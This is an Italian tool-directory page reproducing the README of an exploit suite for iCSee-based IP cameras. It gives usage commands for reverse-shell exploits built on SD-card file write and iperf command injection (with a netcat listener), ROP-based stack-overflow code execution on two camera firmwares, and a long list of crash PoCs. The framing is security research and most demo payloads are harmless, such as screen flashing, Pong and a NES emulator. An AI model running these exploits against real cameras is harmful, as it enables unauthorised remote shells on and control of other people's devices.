Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
iCSeeU — Questa è una suite di strumenti/PoCs/exploit per telecamere che utilizzano l'applicazione iCSee. E sì - può eseguire giochi NES! | Kitploit
Strumenti/GitHubGitHub/lr-m/icseeu
Sicurezza Sistemi EmbeddedSicurezza IoTExploitReverse EngineeringDebuggerFuzzingCTFSicurezza HardwarePaper e RicercaApprendimento e FormazioneAnalisi del FirmwareBinary Exploitation
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHublr-m/icseeu

iCSeeU

Questa è una suite di strumenti/PoCs/exploit per telecamere che utilizzano l'applicazione iCSee. E sì - può eseguire giochi NES!

Vedi Repository

Questa è una suite di strumenti/PoC/exploit che possono essere utilizzati con telecamere per videochiamate iCSee via LAN (e forse anche con telecamere senza videochiamata). Può essere facilmente usata per flashare firmware alternativi in sostituzione del metodo di aggiornamento tramite scheda SD.

Nota: Qualsiasi exploit di corruzione della memoria funzionerà solo se la versione del firmware della tua telecamera è V5.00.R02.000949U5.10000.141324.0000010 o V5.00.R02.000807E5.10000.346724.0000010 – questi exploit si basano su offset fissi, che cambiano ogni volta che il firmware viene compilato.

Blog

[0] Enumerazione, Smontaggio ed Estrazione del Firmware

[1] Imparare il Linguaggio della Telecamera

[2] Trovare Integer Overflow Inutili + Alcuni Bug Utili

[3] Morte per Stack Overflow + Divertimento con i Canary

[4] Sfruttare Tutto

[5] Telecamera Diversa, Stessa App

[6] Vindication + Exploit Completo di Corruzione della Memoria sulla Seconda Telecamera

[7] Emulare Giochi NES sulla Telecamera

Dipendenze

  • pycryptodome : Per la crittografia del login RSA
  • pwntools : Per lo shellcode
  • pyftpdlib : Per il server FTP
  • pynput : Per l'input della tastiera NES

Funzionalità

get_system_info

Questo utilizza il metodo get_system_info per ottenere informazioni sulla telecamera tramite la porta 34567.

root@kitploit:~
python3 icseeu.py get_system_info
root@kitploit:~
{
  "Name": "SystemInfo",
  "Ret": 100,
  "SessionID": "0x0001869f",
  "SystemInfo": {
    "AlarmInChannel": 0,
    "AlarmOutChannel": 0,
    "AudioInChannel": 1,
    "BuildTime": "2024-06-27 10:33:41",
    "CombineSwitch": 0,
    "DeviceModel": "IPC_GK7201V300_G2-WR-V_S38",
    "DeviceRunTime": "0x000026c6",
    "DeviceType": 7,
    "DigChannel": 0,
    "EncryptVersion": "Unknown",
    "ExtraChannel": 0,
    "HardWare": "IPC_GK7201V300_G2-WR-V_S38",
    "HardWareVersion": "Unknown",
    "Pid": "A909409U5000000N",
    "SerialNo": "bf7816d59506ec06",
    "SoftWareVersion": "V5.00.R02.000949U5.10000.141324.0000010",
    "TalkInChannel": 1,
    "TalkOutChannel": 1,
    "UpdataTime": "",
    "UpdataType": "0x00000000",
    "VideoInChannel": 1,
    "VideoOutChannel": 1
  }
}

ftp_get_logs

Utilizza alcune funzionalità testuali rimaste per estrarre i log dal dispositivo (i log finiscono in FTPTestDir/Test).

root@kitploit:~
python3 icseeu.py ftp_get_logs

Exploit

gdb_revshell

Sfrutta una vulnerabilità di scrittura su file della scheda SD e la vulnerabilità di esecuzione del binario iperf che consente l'esecuzione remota di un binario presente sulla scheda SD, per ottenere una reverse shell e avviare un debugger GDB che si attacca al processo principale App.

Terminale 1:

root@kitploit:~
nc -l 1234

Terminale 2:

root@kitploit:~
python3 icseeu.py gdb_revshell

Terminale 3:

root@kitploit:~
gdb-multiarch
gef-remote 192.168.188.2 8888

Nota: Non fermare il programma per più di 30 secondi altrimenti il watchdog si lamenta e il processo App si riavvia!

Nota 2: Potrebbe essere necessario modificare gli indirizzi IP hardcoded nel payload (GDB_Revshell/remote_mgmt.c) con l'IP della propria macchina sulla LAN e ricostruire il payload.

gdb_revshell_inject

Sfrutta una vulnerabilità di scrittura su file della scheda SD e la vulnerabilità di iniezione comandi iperf che consente l'esecuzione remota di un binario presente sulla scheda SD, per ottenere una reverse shell e avviare un debugger GDB che si attacca al processo principale App.

Questo è utile per dispositivi che hanno già un binario iperf presente, che impedisce l'altro metodo.

Terminale 1:

root@kitploit:~
nc -l 1234

Terminale 2:

root@kitploit:~
python3 icseeu.py gdb_revshell_inject

Terminale 3:

root@kitploit:~
gdb-multiarch
gef-remote 192.168.188.2 8888

Nota: Non fermare il programma per più di 30 secondi altrimenti il watchdog si lamenta e il processo App si riavvia!

Nota 2: Potrebbe essere necessario modificare gli indirizzi IP hardcoded nel payload (GDB_Revshell/remote_mgmt.c) con l'IP della propria macchina sulla LAN e ricostruire il payload.

iperf_inject_exploit

Sfrutta l'iniezione comandi iperf per stabilire una reverse shell.

Terminale 1:

root@kitploit:~
nc -l 1234

Terminale 2:

root@kitploit:~
python3 icseeu.py iperf_inject_exploit

Nota: Potrebbe essere necessario modificare gli indirizzi IP hardcoded nel payload (Revshell_Inject/remote_mgmt.c) con l'IP della propria macchina sulla LAN e ricostruire il payload.

Exploit di Stack Overflow per GOKE GK7201

Questi sono exploit per il secondo stack overflow nel gestore del tipo di messaggio 0x7d8. Questo overflow è interessante perché ci permette di bypassare il canary dello stack e ottenere l'esecuzione.

Dovrai costruire il payload del dispatcher prima che funzionino (esegui make nella directory PayloadDispatcher) e il payload che vuoi eseguire sulla telecamera eseguendo make nelle rispettive directory (ad es. ImageDisplay).

Note:

  • La versione del firmware della telecamera deve essere V5.00.R02.000949U5.10000.141324.0000010 (non posso garantire che funzioni per altre)

screenflash

Dimostra che abbiamo l'esecuzione di codice facendo lampeggiare lo schermo.

root@kitploit:~
python3 icseeu.py exploit_goke screenflash

rgb

Dimostra che abbiamo il controllo dello schermo facendo lampeggiare colori RGB.

root@kitploit:~
python3 icseeu.py exploit_goke rgb

imagedisplay

Utilizza la scrittura su file per caricare un'immagine RGB raw 5:6:5, esegui ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565 -f rawvideo image.raw su un'immagine nella directory per ottenere un file image.raw nella directory ImageDisplay affinché funzioni. L'immagine verrà visualizzata sullo schermo.

root@kitploit:~
python3 icseeu.py exploit_goke imagedisplay

buttontest

Dimostra che possiamo leggere lo stato dei pulsanti, lampeggia un colore quando viene rilevata la pressione di uno dei pulsanti.

root@kitploit:~
python3 icseeu.py exploit_goke buttontest

pong

Un'implementazione minimale del gioco Pong che dimostra che abbiamo il controllo dello schermo e dei pulsanti frontali, e mostra anche un payload leggermente più complesso.

root@kitploit:~
python3 icseeu.py exploit_goke pong

nes

Un emulatore NES portato che può eseguire il file rom.nes posizionato nella directory GOKE_Payloads/nes, esegui make in GOKE_Payloads/nes/smolnes e GOKE_Payload/nes per generare i binari.

root@kitploit:~
python3 icseeu.py exploit_goke nes

Exploit di Stack Overflow per XM530V200WX1

Questo è un exploit per uno stack overflow su un'altra telecamera senza canary nello stack, ma con NX. Ho scritto una ROP-chain per spostare lo stack e ottenere l'esecuzione di una lunga ROP-chain; questa ROP-chain mappa memoria eseguibile, carica il contenuto di un file nella memoria, genera un thread che lo esegue, poi ripara lo stato dello stack e continua l'esecuzione.

Dovrai costruire il payload prima che funzionino, esegui make nelle rispettive directory (ad es. ImageDisplay).

Note:

  • Questo exploit è piuttosto inaffidabile, funziona circa il 40-50% delle volte (non ama affatto generare thread per ragioni sconosciute).
  • La versione del firmware della telecamera deve essere V5.00.R02.000807E5.10000.346724.0000010 (non posso garantire che funzioni per altre)

screenflash

Dimostra che abbiamo l'esecuzione di codice facendo lampeggiare lo schermo.

root@kitploit:~
python3 icseeu.py exploit_xm530 screenflash

rgb

Dimostra che abbiamo il controllo dello schermo facendo lampeggiare colori RGB.

root@kitploit:~
python3 icseeu.py exploit_xm530 rgb

imagedisplay

Utilizza la scrittura su file per caricare un'immagine RGB raw 5:6:5, esegui ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565be -f rawvideo image.raw su un'immagine nella directory per ottenere un file image.raw nella directory ImageDisplay affinché funzioni. L'immagine verrà visualizzata sullo schermo.

root@kitploit:~
python3 icseeu.py exploit_xm530 imagedisplay

PoC

Ulteriori dettagli su queste proof of concept (e le loro cause sottostanti) sono nei blog all'inizio di questo readme.

integer_underflow_http

Questo PoC causa un crash dovuto a un integer underflow nel server HTTP.

root@kitploit:~
python3 icseeu.py integer_underflow_http

iperf_run

Questo PoC eseguirà il file memorizzato sulla scheda SD in iperf/iperf (sia script ash che binario).

root@kitploit:~
python3 icseeu.py iperf_run

iperf_inject

Questo PoC eseguirà il comando reboot tramite un'iniezione di comandi; il file iperf/iperf deve esistere sulla scheda SD affinché funzioni.

root@kitploit:~
python3 icseeu.py iperf_inject

assert_trigger_0x41a

Questo PoC innesca un'asserzione a causa di una grande allocazione nel gestore del tipo di messaggio 0x41a (causando un crash).

root@kitploit:~
python3 icseeu.py assert_trigger_0x41a

integer_overflow_0x41a

Questo PoC innesca un crash dovuto a un integer overflow che causa una strana lettura fuori dai limiti nel gestore del messaggio 0x41a.

root@kitploit:~
python3 icseeu.py integer_overflow_0x41a

stack_overflow_0x43a

Questo PoC innesca un crash dovuto a uno stack overflow nel gestore del messaggio di tipo 0x43a.

root@kitploit:~
python3 icseeu.py stack_overflow_0x43a

stack_overflow_0x438_1

Questo PoC innesca un crash dovuto al primo stack overflow nel gestore del messaggio di tipo 0x438.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_1

stack_overflow_0x438_2

Questo PoC innesca un crash dovuto al secondo stack overflow nel gestore del messaggio di tipo 0x438.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_2

stack_overflow_0xdac

Questo PoC innesca un crash dovuto a uno stack overflow nel gestore del messaggio di tipo 0xdac.

root@kitploit:~
python3 icseeu.py stack_overflow_0xdac

stack_overflow_0x5a4

Questo PoC innesca un crash dovuto a uno stack overflow nel gestore del messaggio di tipo 0x5a4.

root@kitploit:~
python3 icseeu.py stack_overflow_0x5a4

stack_overflow_0x414

Questo PoC innesca un crash dovuto a uno stack overflow nel gestore del messaggio di tipo 0x414.

root@kitploit:~
python3 icseeu.py stack_overflow_0x414

stack_overflow_0x410_1

Questo PoC innesca un crash dovuto al primo stack overflow nel gestore del messaggio di tipo 0x410.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_1

stack_overflow_0x410_2

Questo PoC innesca un crash dovuto al secondo stack overflow nel gestore del messaggio di tipo 0x410.

root@kitploit:~
python3 icseeu.py stack_overflow_0x410_2

stack_overflow_0x5a8

Questo PoC innesca un crash dovuto a uno stack overflow nel gestore del messaggio di tipo 0x5a8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x5a8

stack_overflow_0x41e

Questo PoC innesca un crash dovuto a uno stack overflow nel gestore del messaggio di tipo 0x41e.

root@kitploit:~
python3 icseeu.py stack_overflow_0x41e

stack_overflow_0x7d8_1

Questo PoC innesca un crash dovuto al primo stack overflow nel gestore del messaggio di tipo 0x7d8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x7d8_1

stack_overflow_0x7d8_2

Questo PoC innesca un crash dovuto al secondo stack overflow nel gestore del messaggio di tipo 0x7d8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x7d8_2

stack_overflow_0x8a6

Questo PoC innesca un crash dovuto a uno stack overflow nel gestore del messaggio di tipo 0x8a6 (non presente in tutte le telecamere).

root@kitploit:~
python3 icseeu.py stack_overflow_0x8a6
Scarica lo strumento